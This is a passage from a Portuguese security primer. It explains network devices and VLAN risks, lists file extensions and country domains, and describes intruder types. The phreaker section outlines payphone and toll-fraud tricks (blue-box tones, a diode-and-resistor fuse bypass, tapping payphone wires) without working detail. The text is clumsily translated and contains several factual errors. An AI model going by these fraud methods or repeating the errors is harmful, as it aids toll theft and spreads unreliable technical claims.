escuta. Considerando que uma estação está escutando todo o
tráfico da rede de qualquer maneira, um software simples permite
que um sistema registre todas as informações quer de fato ele vê.
Infelizmente, a existência deste modo também permite que uma
pessoa não honesta possa escutar às escondidas as
Terrorismo Tecnológico 30
Aprenda Para Sobreviver

comunicações de rede e roubar informações sensíveis. Este é


particularmente um problema enorme, pois as informações
passadas ao longo de uma rede de computador são transmitidas
como texto claro.

Para minimizar a quantia de informação que podem ser “pegas”


com um monitor de rede ou analisador, o jeito é segmentar tráfico
de rede para isolar algumas comunicações. Isto é melhor realizada
com uma switch, bridge, ou um roteador.

P1.12 Topologias de Circuito privadas

São linhas alugadas que podem ser circuitos analógicos ou


digitais dedicados em que você paga uma taxa pelo servoço. Isto
significa que se você usa o circuito ou não, você estará pagando
uma taxa mensal fixa. Essas linhas São ponto a ponto e sao
usados para conectar um local geográfico a outro.
Um T1 é um sinal full--dúplex (cada lado da conexão pode
transmitir e pode receber simultaneamente) em cima dos cabos de
par trançado. Este par de cabos termina em um receptáculo que
se assemelha a um telefone quadrado usado em casas mais
velhas. T1s são usados para conexões de ponto a ponto. E a
largura da banda em uma T1 está disponível entre 64Kb até
1.544Mb. T1s usam divisão de freqüência para transmitir nos dois
pares de fios 24 canais separados. Divisão de freqüência é a
partilha da largura da banda disponível baseado em incrementos
de freqüência. Isto é extremamente útil como uma T1 é capaz de
levar voz e dados ao mesmo tempo.
Temos no Brasil coisas como Speed da telefônica, que traz
uma conexão de banda larga bem mais alta e é cobrada uma taxa
por seu serviço. Isso é o ADSL.

P1.13 Hardware básicos para Gestão de redes


Terrorismo Tecnológico 31
Aprenda Para Sobreviver

Hoje em dia há uma grande quantidade de produtos para


considerar ao planejar sua infra-estrutura de rede. Há dispositivos
para tudo dês de conectar sistemas de computador à rede para
estender as especificações de uma topologia a controlar tráfico de
rede. Às vezes suas escolhas estão limitadas. Por exemplo, para
conectar um computador de escritório à rede, você tem que ter
uma placa de rede.
Muitos destes dispositivos, quando usado corretamente,
também pode ajudar melhorar sua segurança na rede.

P1.14 Repetidores

Repetidores são simples amplificadores. Eles são usados em


uma topologia de rede para estender a distância máxima que pode
ser feita com cabos. A força do sinal é impulsionada e viaja dentro
dos cabos. Um repetidor receberá um sinal digital e os ampliará, e
transmitirá para outro cabo fazendo assim uma continuação do
sinal.
Um repetidor está como um amplificador de estéreo em
aparelhos de som. O ampère leva o sinal que recebe do CD,
amplia o sinal, e envia isto a seu aparelho de som.
Repetidores funcionam semelhantemente a um amplificador de
radio: eles impulsionam tudo o que simplesmente recebem e
enviam isto em sua outra saída (a continuação dos fios).
Infelizmente, o sinal que um repetidor recebe poderia ser uma
qualidade boa de dados, uma qualidade ruim de dados, ou muito
barulhenta. Um repetidor não discerne qualidade de dados;
simplesmente olha para cada dos pulsos digitais individuais e os
amplifica.
Um repetidor não provê nenhuma segmentação de dados.
Todas as comunicações que acontecem em um lado de um
repetidor são passadas juntas para o outro lado, se o sistema
receptor está no outro fim do cabo ou não.
Terrorismo Tecnológico 32
Aprenda Para Sobreviver

P1.15 Hub

Hub é provavelmente o mais comum dos hardwares de rede


mais próximos às placas de interface de rede. Fisicamente, elas
são caixas de tamanhos variados que têm conectores tipo RJ45
femininos múltiplos. Cada conector é projetado para aceitar um
cabo de par trançado equipado com um conector de RJ45
masculino. Este cabo de par trançado é usado para conectar em
um único servidor ou estação de trabalho.
Hubs são essencialmente repetidores de multi portas que
apóiam cabos de par trançado formando uma topologia de estrela.
Cada nodo comunica com o hub que amplia o sinal e as transmite
para todas as portas (inclusive para a mesma porta que ele
recebeu a transmissão). Como são repetidores, hubs trabalham
em nível elétrico. Quando você projetar sua topologia de rede,
pense em hubs que provêem zero controle de tráfego como
funcionalmente idêntico para repetidores.

P1.16 Bridges

É uma ponte se parece muito com um repetidor; é uma caixa


pequena com dois conectores de rede que prendem a duas
porções separadas da rede. Uma ponte incorpora a funcionalidade
de um repetidor (amplificação notável), mas na verdade olha para
as armações de dados que o que é um grande benefício. Uma
ponte comum é quase idêntica a um repetidor com exceção do
indicador luminosom que piscam sempre que a ponte precisa
passar tráfico de um domínio para outro.

As pontes podem usar informação de cabeçalho da rede


TCP/IP para ficar monitorando a fonte e destino MAC para onde se
dirige. Monitorando o endereço de fonte, a ponte aprende onde
todos os sistemas de rede ficam situados. Constrói uma tabela,
Terrorismo Tecnológico 33
Aprenda Para Sobreviver

enquanto listando quais endereços de MAC são diretamente


acessíveis por cada uma de suas portas. Usa então essas
informações para policiar o tráfego e regular o fluxo de dados na
rede.

Um Exemplo de Ponte

Olhe para a rede em Figura abaixo. A Betty precisa enviar


dados ao servidor Thoth. Como todo o mundo na rede tem que
monitorar a rede, a Betty escuta primeiro as transmissões de
outras estações. Se o fio estiver livre, a Betty transmitirá um
pacote de dados. A ponte também está assistindo os tráfegos e
olhará para o endereço de destino no cabeçalho do pacote de
Betty. Porque a ponte é insegura de qual porta o sistema com
MAC endereçado 00C08BBE0052 (Thoth) é conectado, amplifica o
sinal e retransmite isto fora pa porta B. que até agora a
funcionalidade de ponte é bem parecido a de um repetidor. A
ponte faz uma pequena leitura, porém, aprendeu aquela Betty é
para aportar para porta A e cria uma tabela com o endereço de
MAC dela.
Terrorismo Tecnológico 34
Aprenda Para Sobreviver

Quando Thoth responde ao pedido de Betty, como mostrado na


próxima figura, a ponte olhará novamente para o endereço de
destino no pacote de dados. Porém, desta vez olha em sua tabela,
e nota que aquela Betty também é prendido para Aportar o A. que
Porque sabe que a Betty pode receber esta informação
diretamente, derruba a armação e blocos isto de ser transmitido de
Porto o B. A ponte também fará uma entrada de mesa nova para
Thoth, enquanto registrando o MAC se dirigem como sendo fora
de Porta A.
Terrorismo Tecnológico 35
Aprenda Para Sobreviver

O isolamento de tráfego é uma característica poderosa, porque


significa que sistemas em ambos os lados da ponte podem estar
levando ao mesmo tempo em conversações, dobrando a largura
da banda disponível efetivamente. A ponte assegura que as
comunicações em ambos os lados ficam isoladas, como se elas
nem fossem mesmo conectadas junto. Porque estações não
podem ver as transmissões no outro lado da ponte, eles assumem
que a rede está livre e envia os seus dados.
Isto significa que não há nenhum modo para uma estação ter
uma colisão fora de seu segmento.
A ponte isola tráfego dentro de cada domínio, não há nenhum
modo para sistemas separados colidirem os sinais. O efeito é um
dobramento de largura da banda potencial.
Terrorismo Tecnológico 36
Aprenda Para Sobreviver

Perceba agora que a rede aumentou e muito a sua segurança,


pois agora foi criado uma ponte segura para a comunicação entre
dois usuários e os pacotes só estar trafegando por esse espaço
que esta em segurança devido a forma em que a ponte esta
tratando os pacotes.

P1.17 Switches

Switch é quase como uma ponte só que com uma tecnologia


maior. Eles se assemelham a hubs aparência, tendo conectores
de RJ45 múltiplos para conectar sistemas de rede. Em vez de ser
um simples amplificador como um hub, funciona como um
interruptor como se tivesse uma pequena ponte em cada porta.
Um interruptor aprenderá endereços de MAC preso a cada uma de
Terrorismo Tecnológico 37
Aprenda Para Sobreviver

suas portas e tráfego de rota só será destinados para a porta


correta, a qual os pacotes se destinan.

Veja na figura abaixo um ambiente qual cada dispositivo é


conectado a uma porta dedicada. A Switch aprenderá a
identificação de MAC de cada estação uma vez uma única
transmissão de pacotes acontece (idêntico a uma ponte).
Assumindo que isto já aconteceu basta a máquina enviar o pacote
na rede e a switch encaminhará os dados para a porta de destino
entregando-os em segurança.

Há algumas coisas interessantes sobre esta situação. O


primeiro é que a cada lança,mento de pacotes somente a máquina
e switch receberam os pacotes. Isto significa que a colisão é
limitada as só estes dois dispositivos, por que cada porta do
Terrorismo Tecnológico 38
Aprenda Para Sobreviver

interruptor está agindo como uma ponte. O único tráfego visto


pelas estações de trabalho e servidores especificamente são
somente as que eles mesmos enviaram. Como resultado, todas as
três estações verão muito pouco tráfego de rede e poderão
transmitir imediatamente e multiplamente.
Dado nosso exemplo, se esta for uma rede de 10Mbps, o
processamento efetivo há pouco aumentou por um fator de 3. Isto
é porque todos os três jogos de sistemas podem manter as
conversações simultaneamente, pois o interruptor os isola de um
ao outro. Enquanto ainda tecnicamente for 10Mbps o
processamento potencial aumentou para 30Mbps.

Além de desempenho crescente aumentou-se também


segurança. Se qualquer um destes sistemas for feito um acordo,
as únicas sessões que podem ser monitoradas são sessões com
os que chegaram a um acordo sistema. Por exemplo, se um
atacante ganhar acesso ao Servidor 2, ela não poderá monitorar
sessões de comunicação com Servidores 1 ou com o Servidor 3,
só com o Servidor 2.
Isto é porque monitorando dispositivos podem roubar somente
o tráfego que está sendo transmitindo dentro do fluxo daqueles
cabos.
Enquanto esta for uma característica de segurança
maravilhosa, faz com que o monitoramento de sua rede seja
pouco incômodo. Isto é por que muitas switches incluem um porta
de monitoramento.
Uma porta de monitoramento simplesmente é uma porta na
switch que pode ser configurada para receber uma cópia de todos
os dados transmitidos a uma ou mais portas. Por exemplo, você
poderia pela porta 10 da switch configurando-a para escutar todo o
tráfico da porta 3. Se a porta 3 for um de seus servidores, você
poderá analisar todo o tráfico que flui neste sistema.
Mas este também pode ser um problema de segurança
potencial. Se um invasor puder ganhar acesso administrativo ao
switch (por Telnet, a porta HTTP, SNMP, ou o console), ela teria
carta branca para monitorar qualquer sistema conectado. Se o
invasor conseguisse acessar Servidor 2 e a própria switch, ele
Terrorismo Tecnológico 39
Aprenda Para Sobreviver

estaria agora em uma posição perfeita monitorar todas as


comunicações de rede.

Perceba que pontes, switches, e dispositivos de gestão de


redes são projetados para melhorar o desempenho de rede e não
para melhorar segurança da rede. Segurança aumentada é há
pouco um benefício secundário. Isto significa que eles não
receberam o mesmo tipo cuidado, para que no mundo real não
causasse problemas.

P1.18 VLAN Tecnologia

Switches introduziu uma nova tecnologia de rede que é a Área


Local Virtual (VLAN). Software que corre na switch lhe permite
montar parâmetros de conectividade para sistemas conectados
através de workgroup (chamado grupos de VLAN). O
administrador da switch lhe permite organizar transmissões de
portas logicamente de forma que a conectividade se agrupe de
acordo com as exigências de cada usuário.
Nomeando todas as portas da switch que conectam os PCs
usados pelo pessoal de contabilidade ao mesmo grupo de VLAN,
você pode criar uma rede de contabilidade virtual.
Se você tem uma switch de 24 portas e você as divide em três
VLANs separado, você tem três switchs de 8 porto cada.

Mas se um invasor puder atacar uma switch que usa VLANs,


ele poderia configurar a conexão dele para monitorar qualquer do
outra VLANs no mesmo dispositivo.
Esta pode ser uma coisa extremamente ruim se você tiver uma
switch grande que provê conectividade em ambos os lados de um
dispositivo de controle de tráfego como em um firewall. Um invasor
pode não precisar penetrar em seu firewall ele usará a switch por
ser mais fácil.
Terrorismo Tecnológico 40
Aprenda Para Sobreviver

P1.19 Roteadores

Um roteador é um dispositivo de multi portas que decide como


controlar tráfegos na rede, baseado em protocolo e informação de
rede. Entender o que isto significa verdadeiramente, nós teremos
que olhar primeiro para o que um protocolo é e como ele trabalha.
Até agora, temos comunicado usando o endereço de Controle
de acesso de Mídia nomeado a nossos dispositivos de gestão de
redes.
Nossos sistemas usaram este número para contatar outros
sistemas e transmitir informação.
O problema com este esquema é que não funciona muito bem.
Por exemplo, se você tem 2000 sistemas que precisam comunicar
entre si? Você teria 2000 sistemas que brigam um contra o outro
para a largura da banda em uma única rede de Ethernet.

P1.20 Protocolos de rede

Os mais baixos níveis de um protocolo de rede é um jogo de


regras de comunicação que provêem os meios para transmitir em
rede os dados por uma instalação elétrica comum. Isto faz parte
de um grupo específico, cada um destes sistemas é nomeado com
um endereço de rede de protocolo idêntico.
Endereços de rede são como os de CEP. Assumamos que
alguém remeta uma carta e na frente do envelope simplesmente
se lê: Para o senhor Leandro, Na rua velha. Se isto acontecer em
uma cidade muito pequena, a carta provavelmente chegará (é
como se você tivesse usado um endereço de MAC em uma LAN).
Se a carta fosse remetida em uma cidade como São Paulo ou
Nova Iorque, o correio não teria nenhuma pista para onde enviar
isto.
Sem um CEP, eles não podem nem mesmo tentar encontrar. O
CEP provê um modo para especificar a área geral onde esta carta
precisa ser entregue.
Terrorismo Tecnológico 41
Aprenda Para Sobreviver

O entregador de carta não precisa saber exatamente onde a


rua velha fica situada. Ele simplesmente olha para o CEP e o
envia para quem é responsável entregar cartas nesta área.
Endereços de rede operam dem um modo semelhante. Um
dispositivo atento ao protocolo acrescentará o endereço de rede
do dispositivo de destino ao campo de dados. Também registrará
seu próprio endereço de rede, no caso de as necessidades de
sistema remotas enviem uma resposta.
Isto é onde um roteador entra. Um roteador é um dispositivo
atento ao protocolo que mantém uma tabela de todas as redes
conhecidas. Usa esta tabela para levar o protocolo ao seu destino
final.

Vejamos o exemplo.

Digamos que o sistema que B precisa transmitir informação ao


sistema F

Como as máquinas estão fisicamente separadas, pois estão em


redes diferentes ela precisa de alguém que conheça quem é
aquela máquina e quem sabe disso é o roteador que contem
tabelas com os “CPS” das redes então a máquina B entrega os
Terrorismo Tecnológico 42
Aprenda Para Sobreviver

pacotes ao roteador da network 1 que manda ao roteador da


network 3 que é a onde a máquina F está.

P1.21 Extensões de arquivos comuns e não tão


comuns

.exe é de um arquivo executável assim como .doc é de um


arquivo de texto do Microsoft Word, porém existem alguns
arquivos que muitas vezes recebemos via e-mail e não sabemos
se pode ser vírus, ou nem mesmo sabemos de qual programa ele
pertence a tabela abaixo o ajudara a conhecer um pouco mais a
respeito das extensões.

Ext Arquivo do tipo


7le 7th Level
7lp 7th Level
7ls 7th Level
aiff áudio
ani cursor animado
arj ARJ
art AOL arquivo gráfico comprimido
asf Windows Media
asm ASM
au áudio
avi vídeo
bas código fonte de Basic
bin binário
bmp imagem
c Canvas
cab FutureSplash
cdf IE Channel Definition Format
cdr imagem de CorelDraw
class arquivo Java class
Terrorismo Tecnológico 43
Aprenda Para Sobreviver

cnf E-cash
cod FORTRAN/Multiplan/dBASE
css cascading style sheet
cur cursor Windows
dcr Director
dir directory/Procom dialing directory
doc MS Word
dwt DreamWeaver template
dxr Director
fla Flash
ged imagem
gif imagem
gz arquivo comprimido
hdml handheld device markup language
hqx Mac BinHex
htm html
html htm
inf OS/2 Setup file
ivr image
ivs vídeo
jar Java archive
java Java
jpeg imagem
jpg imagem
js JavaScript
key keyboard macro
lbi DreamWeaver library item
lwp Lotus Word Pro
map mapa de imagem
mdb Acesso
mid MIDI
mod música
mov QuickTime MooV
mp2 mpeg áudio
mp3 mpeg áudio
mpeg mpeg vídeo
mpg mpeg vídeo
mtm multi-tracker module
Terrorismo Tecnológico 44
Aprenda Para Sobreviver

pas pascal
pdf Acrobat Portable Data Format
pl Perl
ply imagem
pps MS PowerPoint slide
pub MS Publisher
png imagem
ppt MS PowerPoint
ps PostScript
qt QuickTime MooV
ra RealAudio
ram RealAudio (ou Vídeo) meta-file
rm RealMedia
rmf áudio
rmx RealJukebox
rp imagem
rpm RealMedia plugin
rt RealText
rtf Rich Text Format
s3m sound
scm video
sit Arquivo comprimido Mac
smi SMIL
smil SMIL
spl Shockwave/Flash
swf Shockwave/Flash
tgz g-zipped TAR
tif imagem
tiff imagem
tmp temporário
tms Telemate script
tsp TrueSpeech
txt ASCII texto
utf8 MS FrontPage
viewlet Viewlet
viv vídeo
vivo vídeo
vox som
Terrorismo Tecnológico 45
Aprenda Para Sobreviver

wav som
wax Windows Media
wma Windows Media
wml WML
wrk planilha
wrl VRML
x fonte LEX
xls Excel
xml extensible markup language
zip arquivo comprimido

P1.22 Em qual país este site está hospedado?

Você já entrou em um site e não teve a menor noção de onde ele está
hospedado? Isso não vai mais acontecer ao entrar em um site observe o final do
endereço e consulte a tabela a seguir ex: www.axcel.com.br o .br quer dizer que
está hospedado no Brasil!

AD Andorra
AE Emirados Árabes Unidos
AF Afeganistão
AG Antígua e Barbuda
AI Anguila
AL Albânia
AM Armênia
AN Antilhas Holandesas
AO Angola
AQ Antártica
Terrorismo Tecnológico 46
Aprenda Para Sobreviver

AR Argentina
AS Samoa Americana
AT Áustria
AU Austrália
AW Aruba
AZ Azerbaijão

BA Bosnia-Herzegovina
BB Barbados
BD Bangladesh
BE Bélgica
BF Burkina Fasso
BG Bulgária
BH Bahrein
BI Burundi
BJ Benin
BM Bermudas
BN Brunei
BO Bolívia
BR Brasil
BS Bahamas
BT Butão
BV Ilha Bouvet
BW Botsuana
BY Bielorússia
BZ Belize
Terrorismo Tecnológico 47
Aprenda Para Sobreviver

CA Canadá
CC Ilhas Keeling (Cocos)
CF República Centro-Africana
CG Congo
CH Suíca
CI Costa do Marfim
CK Ilhas Cook
CL Chile
CM Camarões
CN China
CO Colômbia
CR Costa Rica
CS Tchecoslováquia
CU Cuba
CV Cabo Verde
CY Chipre
CZ República Tcheca

DE Alemanha
DJ Djibuti
DK Dinamarca
DM Dominica
DO República Dominicana
DZ Argélia
Terrorismo Tecnológico 48
Aprenda Para Sobreviver

EC Equador
EE Estônia
EG Egito
ES Epanha
ET Etiópia

FI Finlândia
FJ Ilhas Fiji
FK Ilhas Falkland (Malvinas)
FM Micronésia
FO Ilhas Faroe
FR França
FX França (Território Europeu)

GA Gabão
GB Grã Bretanha (Reino Unido)
GD Granada
GE Georgia
GF Guiana Francesa
GH Gana
Terrorismo Tecnológico 49
Aprenda Para Sobreviver

GI Gibraltar
GL Groenlândia
GM Gâmbia
GN Guiné
GP Guadalupe (Francesa)
GQ Guiné Equatorial
GR Grécia
GT Guatemala
GU Guam (EUA)
GW Guiné Bissau
GY Guiana

HK Hong Kong
HM Ilhas Heard e Macdonald
HN Honduras
HR Croácia
HT Haiti
HU Hungria

ID Indonésia
IE Irlanda
IL Israel
IN Índia
IQ Iraque
Terrorismo Tecnológico 50
Aprenda Para Sobreviver

IR Irã
IS Islândia
IT Itália

JM Jamaica
JO Jordão
JP Japão

KE Quênia
KH Cambódia
KI Kiribati
KM Ilhas Comores
KP Coréia do Norte
KR Coréia do Sul
KW Kuáit
KY Ilhas Cayman
KZ Cazaquistão

LA Laos
Terrorismo Tecnológico 51
Aprenda Para Sobreviver

LB Líbano
LC Santa Lúcia
LI Liechtenstein
LK Sri Lanka
LR Libéria
LS Lesôto
LT Lituânia
LU Luxemburgo
LV Látvia
LY Líbia

MA Marrocos
MC Mônaco
MD Moldávia
MG Madagascar
MH Ilhas Marshall
ML Mali
MN Mongólia
MO Macau
MQ Martinica
MR Mauritânia
MT Malta
MU Ilhas Maurício
MV Maldivas
MW Malaui
MX México
MY Malásia
MZ Moçambique
Terrorismo Tecnológico 52
Aprenda Para Sobreviver

NA Namíbia
NC Nova Caledônia
NE Níger
NF Ilha Norfolk
NG Nigéria
NI Nicarágua
NL Países Baixos (Holanda)
NO Noruega
NP Nepal
NR Nauru
NT Zona Neutra
NU Niue
NZ Nova Zelândia

OM Omã

PA Panamá
Terrorismo Tecnológico 53
Aprenda Para Sobreviver

PE Peru
PF Polinésia
PG Papua
PH Filipinas
PK Paquistão
PL Polônia
PR Porto Rico
PT Portugal
PW Palau
PY Paraguai

QA Qatar

RO Romênia
RU Rússia
RW Ruanda

S
Terrorismo Tecnológico 54
Aprenda Para Sobreviver

SA Arábia Saudita
SB Ilhas Salomão
SC Seicheles
SD Sudão
SE Suécia
SG Cingapura
SH Santa Helena
SI Eslovênia
SK República Eslovaca
SL Sierra Leone
SM San Marino
SN Senegal
SO Somália
SR Suriname
ST São Tomé e Príncipe
SU União Soviética
SV El Salvador
SY Síria
SZ Suazilândia

TD Chade
TG Togo
TH Tailândia
TK Toquelau
TM Turcomenistão
TN Tunísia
TO Tonga
TP Timor Leste
TR Turquia
Terrorismo Tecnológico 55
Aprenda Para Sobreviver

TT Trinidad e Tobago
TV Tuvalu
TW Taiwan
TZ Tanzânia

UA Ucrânia
UG Uganda
UK Reino Unido
US Estados Unidos
UY Uruguai
UZ Uzbequistão

VA Vaticano
VC São Vicente e Granadinas
VE Venezuela
VG Ilhas Virgens Britânicas
VI Ilhas Virgens Americanas
VN Vietnã
VU Vanuatu
Terrorismo Tecnológico 56
Aprenda Para Sobreviver

WS Samoa

YE Iêmen
YU Iugoslávia

ZA África do Sul
ZM Zâmbia
ZR Zaire
ZW Zimbabue
Terrorismo Tecnológico 57
Aprenda Para Sobreviver

Capítulo I

Introdução à segurança – Ao entrarmos em um aeroporto,


espera-se toda a segurança que é necessária, já que a própria
historia nos vem mostrando que é um assunto delicado e que deve
ser abordado. Mas existe o terror tecnológico? Ele nos trará
problemas? Quais problemas?
Terrorismo Tecnológico 58
Aprenda Para Sobreviver

Parte I

1.1 Estamos totalmente seguros?

Com absoluta certeza não! Munidos de um computador e uma


conexão a Internet, pode-se invadir um aeroporto em Nova York,
mesmo estando em uma pequena cidade do interior de Minas
Gerais no Brasil ou em qualquer lugar do mundo onde se tenha
acesso a Internet. E isto pode acontecer em qualquer outro
aeroporto existente.
Já ficou comum lermos em jornais sobre algum hacker que
tenha invadido sistemas, roubando bancos, ou apagando e lendo
dados confidenciais.
E isto pode se estender a uma grande confusão no aeroporto
como passageiros com nomes trocados ao embarcar, nomes que
não constam na lista, informações nos letreiros erradas, ou na pior
das hipóteses, uma invasão no Controle de Trafego Aéreo, que
poderia causar a queda de um avião, uma colisão, ou no menos
pior o avião acabar alguns kilometros longe do destino final.
E isso pode acontecer facilmente já que em dias nublados ou a
noite é apenas por instrumentação que o avião utiliza para se
orientar.
Quando um avião esta chegando ao aeroporto ele recebe
informações como a de que o avião esta a uma quantidade x de
“kilometro” do solo.
Bom imagine que na realidade ele está a 400 metros do solo,
mas o seu indicador informou que está a 600 metros. Quando o
piloto achar que ainda faltam 200 metros do solo, o avião já estará
explodindo e devastando tudo o que há em volta.

Pânico geral. Mas não se deve ter medo, mas sim tomar
certas políticas de seguranças e assim dificultar e proteger todo o
sistema computacional, o que é imprescindível.
Terrorismo Tecnológico 59
Aprenda Para Sobreviver

Políticas de segurança como usuários domésticos também tem


que tomar como, por exemplo, usar o Net Bank na sua casa a
vontade, mas mantenha sempre o seu sistema operacional,
Service Pack, e o navegador, geralmente o I.E. e o Netscape,
sempre atualizados. Evite acessar sua conta de universidades,
Cyber Cafés e locais onde muitas pessoas usam o mesmo micro.
Soluções simples, mas muito eficazes.
Isto lembra o caso como o da corrida espacial. Quando os EUA
gastaram milhões para desenvolver uma caneta, pois as canetas
normais não escreviam de cabeça para baixo e com a pouca
gravidade. A URSS resolveu o problema usando um lápis.

Há muita espionagem industrial. Experts em informáticas são


contratados para invadir sistemas e descobrir dados confidenciais.
Grupos de hacker brasileiros estão cada vez mais “populares”,
já que o Brasil é um dos paises onde mais se têm invasores e
menos seguranças, chegando a ponto de empresas como a Nasa
proíbe que certas páginas do seu site sejam exibidas para
moradores do Brasil, com finalidade da não invasão.
Outro grande problema são com os vírus, que não descobrem
nada porém apagam arquivos e geram uma dor de cabeça bem
grande para os administradores de rede e todos os usuários.

Mas...

1.2 Quais os motivos que levam este invasor?

Terrorismo é o maior problema a ser enfrentado. Fazer uma


confusão nos computadores dos aviões ou do ATC (comando de
trafego aéreo). Pode-se também conseguir dados de certas
empresas aéreas, seus funcionários e passageiros.
Terrorismo Tecnológico 60
Aprenda Para Sobreviver

Todo o sistema aéreo é computadorizado, deixando então uma


ampla possibilidade aos terroristas cibernéticos.
Os outros invasores o fazem pelo prazer de dizer que possui
um conhecimento maior e se afirmar como mais poderoso.
Claro que há os que querem ganhar dinheiro roubando
informações, dados, senhas etc, mas a maioria quer mostrar que
manda e tem poder na net. Busca de vingança também é bem
grande. E a vontade de apagar sistemas confundir os
controladores embaralhar informações e rir do sofrimento do outro.

E hoje o principal medo são os Terroristas, que não se sabe


como, quando e em que lugar eles irão atacar.

1.3 Como é este Hacker?

Certamente se você procurar na Internet vai achar muitos sites


que dizem como é esse invasor. É tudo furada.
Particularmente já vi quase de tudo, por exemplo, o de um
menino de 14 anos que retirou R$ 4000,00 reais da conta de um
vizinho, ou outro que trocou uma foto da capa de um site de
jornalismo bem conhecido por uma foto pornográfica e pessoas
bem mais velhas enfim não existe um biótipo.
Porém, geralmente são do sexo masculino, quietos, e não são
do tipo que dizem: “eu faço...”, eles fazem.
Já, aqueles caras que na sala de aula de um curso ou em uma
roda de bate papo falam que fazem isso, invadem aquilo... Esses
normalmente nem sabem enzipar um arquivo.
Terrorismo Tecnológico 61
Aprenda Para Sobreviver

1.4 Sistema Seguro

Vemos hoje em dia muitos administradores colocando um


sistema Unix, e geralmente o Linux como servidor e em alguns
casos até como micro clientes, geralmente achando que assim seu
sistema estará seguro.
Muito mais inocente é aquele que instala um antivírus ou um
firewall e começa a se sentir em uma fortaleza, parece até a
historia dos três porquinhos, acontece que nesse ponto
(informática e segurança) é como um ladrão, se ele realmente
quer roubar uma casa um simples cadeado não vai fazer
diferença, pode até atrapalhar um pouco, mas nada que uma serra
não resolva.
A questão é que quem cuidará da rede (administrador ou o
administrador de segurança) deve se conscientizar e usar uma
ampla política de segurança. Que muitas vezes não requer nem
muitos gastos, a não ser gasto de tempo, paciência e muito
conhecimento.
Daí vale lembrar que alguém que é contratado por pouco
dinheiro possivelmente saberá pouco e fará menos ainda.

1.5 O administrador

É o principal responsável pela rede. Geralmente quem a


projetou, é quem a administra.
Possivelmente ele deve todos os dias checar os logs de erro,
checar os dados, administrar usuários, controlar servidores, fora
todos os problemas que acontecem todos os dias em uma rede.
Acontece que a grande maioria dos administradores hoje não se
preocupa com a segurança como deviam, e é obvio que caso os
problemas não sejam corrigidos conforme forem aparecendo logo
Terrorismo Tecnológico 62
Aprenda Para Sobreviver

a rede ira parar, não importando se é uma rede feita com fibra
óptica, servidores duais com três GB de memória DDR-DIMM. Não
importa qual sistema operacional ou antivírus e firewall instalados,
a rede vai dar problema!
Tudo tem que ser resolvido rapidamente caso for ficar
pensando muito e burocratizando atrapalhara a resolução e assim
a rede ficara cada vez mais com problemas. Imagine uma situação
de um banco as 11:30 da manha, com filas kilometricas e pronto.
O sistema cai. Parece engraçado, mas duvido que alguém já não
chegou em uma loja, supermercado, hospital ou em algum lugar
que se use a informática e alguém falou essa frase – "desculpe,
mas o sistema caiu”.
Não vou dizer que isso não acontece, mas a máquina não erra
e sim nós.

1.6 Mentiras? Imaginação?

Há uma diferença grande entre os invasores que vemos nos


filmes e os da vida real. Não existe mágica nem efeitos especias, e
absolutamente não há nada de espetacular e incrível de se fazer
uma invasão em um sistema alheio. Bastam alguns
conhecimentos e pronto se o sistema a ser invadido não tem
política de segurança qualquer pessoa com um conhecimento
mínimo de informática pode conseguir algum resultado. É claro
que você não vai invadir uma grande empresa que toma todos os
cuidados, mas as informações de seus amigos já é outra historia.
Terrorismo Tecnológico 63
Aprenda Para Sobreviver

Parte II

1.7 Os Invasores

A definição mais apropriada seria dizer que é um invasor,


qualquer um que entre em um sistema no qual não lhe foi dado à
permissão.
Então qualquer um que o fizer será um invasor, mesmo que
esse não tenha um grande conhecimento de informática, mas
conseguiu ver algo que não lhe foi concebido.

1.7.1 - Lammer

Esse é o que mais tem, mas nunca admite ser. O lammer é um


cara que começou a aprender informática e lendo alguns textos já
se acha o tal. Ele diz fazer muitas coisas como invadir destruir e
faz muita autopropaganda, mas no fim ele mal sabe usar um arj.

1.7.2 - Hackers

Esses são muito confundidos, os lammers, sem entender de


nada, (mas dizendo que sabem tudo) se diz ser um hacker.
Hackers são pessoas que vivem para a informática, gostam e
querem aprender tudo a seu respeito. Aprendem a invadir destruir
e tudo mais, mas não o fazem, pois só tem a curiosidade de
aprender e saber das falhas.
Cresce muito o número de empresas que contratam os
hackers para defender o seu sistema.
Terrorismo Tecnológico 64
Aprenda Para Sobreviver

1.7.3 - Cracker

Agora sim é perigoso! Esse tem o prazer em destruir, roubar


informações para o seu uso e para vendê-la, ou somente ter a
diversão em ver tudo parar de funcionar e dizer que foi ele quem o
fez.
Constrói vírus, usa trojans, enfim o que há de ruim está neste
ser.
Muitas vezes eles querem se vingar de algum administrador,
operador de sistema ou de algum canal de IRC, enfim eles usam o
seu conhecimento para benefícios pessoais.
Esse é muito contratado por algumas empresas para fazer
espionagem industrial.

1.7.4 - Phreakers

São experts em telefonia, querem entender como funcionam


todo o processo telefonico e é claro tirar vantagem disto.
Geralmente utilizam programas e dispositivos que assim podem
utilizar o telefone gratuitamente. Coisas que chegam a ser muito
fácil de fazer, e realmente funcionam.
Pioneiro nisso foi o Capitão Crunch, que com um pequeno apito
encontrado em pacotes de cereais percebeu que tinha a mesma
freqüência usada pelos orelhões da AT&T, fazendo com que
discassem de graça. Coisa parecida com o que aconteceu com os
orelhões na Telefonia no Brasil que a partir dos barulhos feitos
pelo celular completavam as ligações. O problema foi resolvido
tendo que trocar algumas placas destes orelhões.
Muito utilizado é o blue box, um programa que gera tons de
2600db pela placa de som, fazendo com que a companhia
telefônica não reconheça a chamada e então não será cobrada a
ligação. Já o Black Box funciona para ser usado nos telefones
particulares (domésticos).
Já os que preferem a parte física da coisa podem usar um
diodo e um resistor nos orelhões, pois funciona mais ou menos
Terrorismo Tecnológico 65
Aprenda Para Sobreviver

assim: Quando você coloca o cartão telefônico ele tem uma certa
quantidade de fusíveis quando se completa uma chamada é
emitido um certo “choque” e então queima um desses fusíveis e lá
se vai uma unidade do cartão.
Basta que esse fusível não se queime! A prática do diodo e
resistor simplesmente engana o orelhão. Outra coisa praticada por
esses invasores são o de cortar os dois fios atrás do orelhão
(naquela torre ou perto da parede) e ligá-lo a um telefone comum
assim funcionara como um telefone doméstico. As companhias
telefônicas devem tomar mais cuidado.
Isso tudo é crime, porém é muito mais muito difícil esses
Phreakers serem pegos, e nossas leis estão um pouco para não
dizer muito atrazada.
Há também funcionarios da própria empresa telefonica que
instala telefones clandestinos, geralmente em nome de defuntos
ou laranjas, essa prática vem cescendo muito, principalmente pela
má contratação, pessima qualidade e falta de treinamento dos
seus funcionarios.

No capítulo 5 este assunto é tratado de uma forma mais prática.

1.7.5 - Funcionários

Esse é o principal problema. Geralmente 70% dos problemas


ocorridos estão aqui.
Funcionários mal remunerados ou subordinados querem
